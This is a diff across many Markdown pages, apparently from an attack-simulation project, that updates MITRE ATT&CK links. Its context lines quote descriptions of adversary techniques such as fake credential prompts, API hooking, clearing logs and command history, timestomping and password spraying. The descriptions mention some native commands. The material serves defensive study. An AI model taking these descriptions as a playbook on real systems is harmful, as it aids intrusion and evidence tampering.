 Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
@@ -1,5 +1,5 @@
 # T1056.002 - GUI Input Capture
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/002)
 <blockquote>Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).

 Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015). </blockquote>
@@ -1,5 +1,5 @@
 # T1056.004 - Credential API Hooking
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056.004)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/004)
 <blockquote>Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:

 * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)
@@ -1,5 +1,5 @@
 # T1057 - Process Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1057)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1057)
 <blockquote>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

 In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.</blockquote>
@@ -1,5 +1,5 @@
 # T1059.001 - PowerShell
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/001)
 <blockquote>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

 PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
@@ -1,5 +1,5 @@
 # T1059.002 - AppleScript
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/002)
 <blockquote>Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. (Citation: Apple AppleScript) These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.

 <code>osascript</code> executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -1,5 +1,5 @@
 # T1059.003 - Windows Command Shell
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.003)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/003)
 <blockquote>Adversaries may abuse the Windows command shell for execution. The Windows command shell (<code>cmd.exe</code>) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. 

 Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
@@ -1,5 +1,5 @@
 # T1059.004 - Unix Shell
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.004)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/004)
 <blockquote>Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

 Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
@@ -1,5 +1,5 @@
 # T1059.005 - Visual Basic
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.005)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/005)
 <blockquote>Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)

 Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA)  VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
@@ -1,5 +1,5 @@
 # T1069.001 - Local Groups
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1069.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1069/001)
 <blockquote>Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

 Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.</blockquote>
@@ -1,5 +1,5 @@
 # T1069.002 - Domain Groups
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1069.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1069/002)
 <blockquote>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

 Commands such as <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility,  <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.</blockquote>
@@ -1,5 +1,5 @@
 # T1070.001 - Clear Windows Event Logs
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/001)
 <blockquote>Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

 The event logs can be cleared with the following utility commands:
@@ -1,5 +1,5 @@
 # T1070.002 - Clear Linux or Mac System Logs
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/002)
 <blockquote>Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)

 * <code>/var/log/messages:</code>: General and system-related messages
@@ -1,5 +1,5 @@
 # T1070.003 - Clear Command History
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.003)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/003)
 <blockquote>In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.

 These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
@@ -1,5 +1,5 @@
 # T1070.004 - File Deletion
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.004)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/004)
 <blockquote>Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

 There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</blockquote>
@@ -1,5 +1,5 @@
 # T1070.005 - Network Share Connection Removal
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.005)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/005)
 <blockquote>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. (Citation: Technet Net Use)</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1070.006 - Timestomp
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.006)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/006)
 <blockquote>Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.

 Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)</blockquote>
@@ -1,5 +1,5 @@
 # T1070 - Indicator Removal on Host
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070)
 <blockquote>Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/*.

 These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.</blockquote>
@@ -1,5 +1,5 @@
 # T1071.001 - Web Protocols
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1071.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1071/001)
 <blockquote>Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

 Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </blockquote>
@@ -1,5 +1,5 @@
 # T1071.004 - DNS
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1071.004)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1071/004)
 <blockquote>Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

 The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) </blockquote>
@@ -1,5 +1,5 @@
 # T1074.001 - Local Data Staging
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1074.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1074/001)
 <blockquote>Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1078.001 - Default Accounts
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1078.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1078/001)
 <blockquote>Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019)

 Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)</blockquote>
@@ -1,5 +1,5 @@
 # T1082 - System Information Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1082)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1082)
 <blockquote>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

 Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS <code>systemsetup</code> command, but it requires administrative privileges.
@@ -1,5 +1,5 @@
 # T1083 - File and Directory Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1083)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1083)
 <blockquote>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

 Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).</blockquote>
@@ -1,5 +1,5 @@
 # T1087.001 - Local Account
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1087.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1087/001)
 <blockquote>Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

 Commands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and <code>groups</code>on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file.</blockquote>
@@ -1,5 +1,5 @@
 # T1087.002 - Domain Account
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1087.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1087/002)
 <blockquote>Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.

 Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups.</blockquote>
@@ -1,5 +1,5 @@
 # T1090.001 - Internal Proxy
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1090/001)
 <blockquote>Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.

 By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.</blockquote>
@@ -1,5 +1,5 @@
 # T1095 - Non-Application Layer Protocol
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1095)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1095)
 <blockquote>Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

 ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</blockquote>
@@ -1,5 +1,5 @@
 # T1098 - Account Manipulation
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1098)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098)
 <blockquote>Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1105 - Ingress Tool Transfer
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1105)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1105)
 <blockquote>Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1106 - Native API
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1106)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1106)
 <blockquote>Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

 Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
@@ -1,5 +1,5 @@
 # T1110.001 - Password Guessing
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/001)
 <blockquote>Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

 Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
@@ -1,5 +1,5 @@
 # T1110.002 - Password Cracking
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/002)
 <blockquote>Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1110.003 - Password Spraying
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110.003)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/003)
 <blockquote>Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)

 Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:
@@ -1,5 +1,5 @@
 # T1112 - Modify Registry
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1112)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1112)
 <blockquote>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

 Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
@@ -1,5 +1,5 @@
 # T1113 - Screen Capture
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1113)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1113)
 <blockquote>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
 </blockquote>

@@ -1,5 +1,5 @@
 # T1114.001 - Local Email Collection
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1114.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1114/001)
 <blockquote>Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.

 Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\<username>\Documents\Outlook Files` or `C:\Users\<username>\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)</blockquote>
@@ -1,5 +1,5 @@
 # T1115 - Clipboard Data
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1115)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1115)
 <blockquote>Adversaries may collect data stored in the clipboard from users copying information within or between applications. 

 In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)</blockquote>
@@ -1,5 +1,5 @@
 # T1119 - Automated Collection
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1119)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1119)
 <blockquote>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. 

 This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.</blockquote>
@@ -1,5 +1,5 @@
 # T1123 - Audio Capture
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1123)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1123)
 <blockquote>An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.

 Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.</blockquote>
@@ -1,5 +1,5 @@
 # T1124 - System Time Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1124)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1124)
 <blockquote>An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)

 System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.</blockquote>
@@ -1,5 +1,5 @@
 # T1127.001 - MSBuild
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1127.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1127/001)
 <blockquote>Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)

 Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)</blockquote>
@@ -1,5 +1,5 @@
 # T1132.001 - Standard Encoding
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1132.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1132/001)
 <blockquote>Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1134.004 - Parent PID Spoofing
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1134.004)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1134/004)
 <blockquote>Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)

